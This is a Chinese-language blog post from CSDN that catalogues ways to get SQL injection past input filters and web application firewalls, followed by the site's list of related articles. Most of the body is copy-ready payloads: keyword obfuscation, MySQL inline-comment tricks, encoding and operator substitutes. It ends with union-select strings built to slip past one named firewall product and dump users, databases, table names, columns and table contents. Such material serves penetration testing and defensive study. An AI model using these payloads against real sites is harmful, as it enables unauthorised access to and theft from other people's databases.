SQL注入绕过

最新推荐文章于 2024-08-11 13:28:35 发布
最新推荐文章于 2024-08-11 13:28:35 发布
阅读量997 收藏 20
点赞数 26
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HOU_XIAO_BAI/article/details/134584530
版权

一、注释符号绕过

在sql中常用的注释符号有

--、#、/*xxx*/、

二、大小写绕过

当web正则过滤的时候对大小写不敏感的情况下使用,一般很少会有这种漏洞

比如当过滤了select的时候我们可以采用SEleCT来查询

三、内联注释绕过

首先介绍一下mysql数据库的注释符

在MySQL里,多行解释 是 /* */,这个是SQL的标准 但是MySQL扩张了解释 的功能比如注释/**/在起头的/*后头加了!变成了/*!*/

我们叫它为内联注释

把要使用的查询语句放在/*。。。*/中,这样在一般的数据库是不会执行的,但是在mysql中内联注释中的语句会被执行。

参考网址:https://www.cnblogs.com/cn-36/p/6723688.html

四、双写关键字绕过

有的waf只会对关键词过滤一次,这时候采用双写的方式可以绕过。

selselectect * from user; 过滤select后变成 select * from user;

不但可以进行双写绕过,也可以尝试一下三写

anaandndd1=(selecseselectlectt @@version)--+

记一次失败的MSSQL注入绕过

五、特殊编码绕过

十六进制:

select * from users where username = 0x7a68616e677961;

ascii编码绕过

六、空格过滤绕过

/**/ ,(),`,tab,两个空格

一定要注意在使用()绕过的时候,括号里边不能有*号

七、or and xor not 过滤绕过

and = &&     or = ||  xor = | #   not = !

1%20and%20/!500011/=/!500011/

1%20and%20/!500011/=/!500012/

if((1=2),1,1)

1%20and/%!%22//1=1%20--%20+

八、=号过滤绕过

=号和不加通配符的 like 是一样的。

   还可以使用 < >号来绕过

<> 在mysql中等于!= 如果在加一个! 双重否定代表肯定 就是= 了

   strcmp(str1,str2):若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1

between关键字

 九、引号被过滤

使用十六进制过滤,同上。

常用在web应用使用的字符集为GBK时,并且过滤了引号,就可以试试宽字节。

十、逗号被过滤

   正常情况下的substr表达式是substr(str1,start,long)

可以使用一个替代逗号的方法就是使用from pos for len,其中pos代表从pos个开始读取len长度的子串

   使用offset关键字

适用于limit中的逗号被过滤的情况

Limit 1,2表示从第二行开始,取两行。Limit 1 offset 5 表示从第六行开始取一行。

安全狗绕过

 

select

/*!50000%53elect*/

order 

 /*!50000%6frder*/

union

/*!50000%75nion*/

 

and绕过

1%20and%20/!500011/=/!500011/

1%20and%20/!500011/=/!500012/

if((1=2),1,1)

1%20and/%!%22//1=1%20--%20+

 

Order by 绕过

/*%!*干扰

1/%2a%%2f/order/%2f%2f/by/%2f%2f/2

union select 绕过

-1/*%2a%%2f*/union/%2f%2f*//*!50001select*//*%2f%2f*/1,2

获取当前数据库和用户

-1/*%2a%%2f*/union/%2f%2f*//*!50001select*//*%2f%2f*/1,user(/* */)

数据库同理

-1/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,database(/%2f%2f/)

获取数据表

-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3  %0a  from information_schema.tables where table_schema=database(////)

这里其实REGEXP "[…任意%23]"就行,在url解码%23变成了#,安全狗认为后面全都成为了注释符,带入到mysql层面其实%23只是正则的一个参数并不是注释符

获取表字段

-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(column_name),3  %0a  from information_schema.columns where table_name="newss"

获取数据

-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,content,3  %0a  from newss

参考链接:sql注入bypass最新版某狗

侯小白哥哥
关注
sql注入绕过
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-16 885
【代码】sql注入绕过
10.sql injection之高级注入(绕过limit 1)(High)-------小白笔记
qwsn
11-03 2492
讲在前面: 1.什么是limit 1的限制: limit 1:使结果集只显示一条记录 2.sql注入(High与Medium)的加固比较: 3.high的源码: 注入过程: 1.输入: 1 2.输入: 1 union select 1,2 # 3.输入: 1’ union select 1,2#(为字符型注入) 4.输入: 1’ union select 1,database()...
SQL注入实战:绕过操作
ting_liang的博客
01-27 2637
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
第四章 SQL注入
最新发布
weixin_51186121的博客
08-11 275
SQL注入问题说的是:用户输入的信息中含有SQL语句关键字,和程序中的SQL语句进行字符串拼接,导致程序中的SQL语句改变了原意。原因是:用户提供的信息中有SQL语句关键字,并且和底层的SQL字符串进行了拼接,变成了一个全新的SQL语句。,也就是说:用户提供的信息中即使含有SQL语句的关键字,那么这个信息也只会被当做一个值传递给SQL语句,用户提供的信息不再参与SQL语句的编译了,这样就解决了SQL注入问题。如果以上的SQL语句能够查询到结果,说明用户名和密码是正确的,则登录成功。
渗透测试-SQL注入手法与绕过手段
Sgirll的博客
06-17 968
union select 1,group_concat(table_name),3:使用 UNION 操作符,这部分查询语句返回一个包含三列数据的结果集:第一列是数字 1,第二列是目标数据库中所有数据表的名称列表,这里使用了 GROUP_CONCAT 函数进行聚合拼接,第三列是数字 3。该攻击利用了 SQL 注入漏洞,通过修改原有的 SQL 语句,绕过了应用程序的输入校验机制,从而对目标数据库造成了安全风险。id=1:假定这是一个 Web 应用程序的 URL 查询字符串参数,指定了 id 参数的值为 1。
SQL注入方法登录成功
h0ck1r的博客
03-18 964
认识SQL注入以及一个简单的示例
sql注入(三)绕过方法及防御手段
Innocence_0的博客
03-07 1899
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
SQL注入以及部分绕过方法详解
时乙的博客
09-23 1612
数据库知识补充 1.information_schema数据库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在information_schema 中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。 2.information_schema.schemata表 提供了当前mysql实例中所有数据库的信息,其中需要用到的是 schema_name 这一列,存放的是各个数据库的名称 .
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL防注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
MySQl登录实例的SQL的注入问题
weixin_51232559的博客
07-01 1227
SQL注入问题想必大家都会有所听闻,因为也许大家都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是SQL注入方法。SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。...
sql注入详解
m0_67392811的博客
06-12 6028
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
​ 一文搞懂什么是SQL注入---SQL注入详解
VN520的博客
09-06 552
通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程:词法和语义解析 优化sql语句,制定执行计划 执行并返回结果 我们把这种普通语句称作Immediate Statements。但是很多情况,我们的一条sql语句可能会反复执行,或者每次执行的时候只有个别的值不同(比如query的where子句值不同,update的set子句值不同,insert的values值不同)。如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。
Vulnhub_CengBox
weixin_44193247的博客
11-09 4402
Vulnhub_CengBox
sql注入之(登录绕过
热门推荐
qq_42383069的博客
05-06 2万+
sql注入之(登录绕过) 原理说明: Mysql数据库查询语句: 一般的登录sql语句如下: select name.passwd from users where username=‘name’ and password=‘pwd’; 分析: 如果我们输入的是正确的用户名与密码,肯定就可以登陆进去,错的就不行了。但是这个验证机制可以通过SQL语句来构造一个特殊的“字符串”通过验证。 比如我们...
SQL注入
无痕的博客
04-02 430
sql注入原理与防护策略
SQL注入绕过WAF策略与技巧解析
以下是一些常用的SQL注入绕过WAF的方法: 1. **注入类型**: - GET注入:攻击者通常利用URL参数传递恶意SQL代码。 - POST注入:在表单提交的数据中插入SQL。 - COOKIE注入:利用HTTP头或Cookie中的数据进行注入。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值